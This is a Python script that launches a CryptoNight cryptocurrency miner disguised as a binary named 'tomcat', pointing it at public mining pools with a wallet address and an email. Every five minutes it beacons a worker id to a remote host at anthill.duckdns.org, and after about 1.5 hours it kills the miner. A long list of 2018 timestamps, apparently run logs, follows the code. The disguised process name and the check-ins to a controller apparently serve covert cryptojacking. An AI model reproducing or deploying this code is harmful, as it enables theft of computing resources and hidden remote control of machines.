import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:01.686856
#2018-02-17 16:23:01.993706
#2018-02-17 18:10:06.524802
#2018-02-17 19:57:06.151972
#2018-02-17 21:45:01.706218
#2018-02-17 23:29:05.994329
#2018-02-18 01:19:01.262565
#2018-02-18 03:06:06.159907
#2018-02-18 04:53:03.424117
#2018-02-18 06:43:02.091187
#2018-02-18 08:33:03.873506
#2018-02-18 10:20:08.414298
#2018-02-18 12:06:07.519493
#2018-02-18 13:51:01.691668
#2018-02-18 15:43:03.942047
#2018-02-18 17:33:04.591888
#2018-02-18 19:21:03.964114
#2018-02-18 21:06:07.488081
#2018-02-18 22:53:01.896178
#2018-02-19 00:40:08.107422
#2018-02-19 02:26:06.521411
#2018-02-19 04:13:01.295709
#2018-02-19 05:57:05.373276
#2018-02-19 07:47:03.891387
#2018-02-19 09:37:05.191222
#2018-02-19 11:26:02.200315
#2018-02-19 13:12:06.634243
#2018-02-19 15:01:01.781174
#2018-02-19 16:49:06.921402
#2018-02-19 18:36:06.456242
#2018-02-19 20:21:04.932599
#2018-02-19 22:12:01.744660
#2018-02-19 23:57:05.041536
#2018-02-20 01:45:09.845239
#2018-02-20 03:34:02.094715
#2018-02-20 05:21:06.713603
#2018-02-20 07:06:05.869488
#2018-02-20 08:52:03.926111
#2018-02-20 10:36:06.080676
#2018-02-20 12:22:03.917649
#2018-02-20 14:09:05.677648
#2018-02-20 15:53:08.277595
#2018-02-20 17:39:11.812278
#2018-02-20 19:27:07.188976
#2018-02-20 21:15:06.571731
#2018-02-20 23:00:11.821366
#2018-02-21 00:44:05.927893
#2018-02-21 02:29:02.208007
#2018-02-21 04:18:01.330605
#2018-02-21 06:04:07.423095
#2018-02-21 07:52:04.800233
#2018-02-21 09:37:01.703007
#2018-02-21 11:26:08.800917
#2018-02-21 13:15:01.452236
#2018-02-21 15:04:02.238236
#2018-02-21 16:54:10.700060
#2018-02-21 18:41:04.438038
#2018-02-21 20:27:05.785371
#2018-02-21 22:15:07.890615
#2018-02-22 00:06:05.806639
#2018-02-22 01:53:04.666796
#2018-02-22 03:40:04.260907
#2018-02-22 05:27:03.839979
#2018-02-22 07:12:04.424843
#2018-02-22 08:58:04.771624
#2018-02-22 10:47:08.158332
#2018-02-22 12:33:01.524712
#2018-02-22 14:18:08.678518
#2018-02-22 16:06:11.727691
#2018-02-22 17:52:02.238341
#2018-02-22 19:39:02.149807
#2018-02-22 21:31:08.607166
#2018-02-22 23:18:08.141256
#2018-02-23 01:04:06.382815
#2018-02-23 02:52:03.892016
#2018-02-23 04:40:08.350851
#2018-02-23 06:26:04.490995
#2018-02-23 08:14:02.262648
#2018-02-23 10:29:07.302345
#2018-02-23 12:21:08.643638
#2018-02-23 14:10:07.745914
#2018-02-23 15:59:08.811757
#2018-02-23 17:46:09.154424
#2018-02-23 19:33:01.644213
#2018-02-23 21:16:05.700238
#2018-02-23 23:03:07.021431
#2018-02-24 00:50:04.430354
#2018-02-24 02:33:05.752498
#2018-02-24 04:26:05.334897
#2018-02-24 06:13:04.660969
#2018-02-24 08:02:01.502132
#2018-02-24 09:44:07.818864
#2018-02-24 11:39:02.157031
#2018-02-24 13:29:05.272996
#2018-02-24 15:18:01.864882
#2018-02-24 17:08:06.341127
#2018-02-24 19:00:08.721726
#2018-02-24 20:47:04.553796
#2018-02-24 23:03:06.418945
#2018-02-25 02:20:07.047116
#2018-02-25 05:49:06.035767
#2018-02-25 11:37:02.413968